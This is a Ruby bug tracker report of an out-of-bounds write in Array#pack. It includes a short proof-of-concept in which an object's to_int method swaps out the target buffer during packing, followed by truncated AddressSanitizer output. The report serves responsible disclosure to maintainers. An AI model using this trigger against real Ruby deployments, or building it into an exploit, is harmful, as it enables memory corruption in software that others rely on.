Issue #22337 has been reported by danielchong (Daniel Chong). ---------------------------------------- Bug #22337: OOB write in array.pack() https://bugs.ruby-lang.org/issues/22337 * Author: danielchong (Daniel Chong) * Status: Open * ruby -v: 4.1.0-dev * Backport: 3.3: UNKNOWN, 3.4: UNKNOWN, 4.0: UNKNOWN ---------------------------------------- Hi, I found a case that causes an oob write in array.pack() PoC: ``` buf = "Z" * 4096 $buf = buf evil = Object.new def evil.to_int $buf.replace("q") 123456789 end [evil].pack("r", buffer: buf) ``` asan output (truncated): ``` ==ERROR: AddressSanitizer: use-after-poison ... WRITE of size 1 #0 bary_pack bignum.c:911 #1 rb_integer_pack bignum.c:3673 #2 pack_pack pack.c:800 <- write at RSTRING_PTR(res)+stale_start #3 vm_opt_newarray_pack_buffer vm_insnhelper.c:6632 Address ... is a wild pointer inside of access range of size 0x1. ``` -- https://bugs.ruby-lang.org/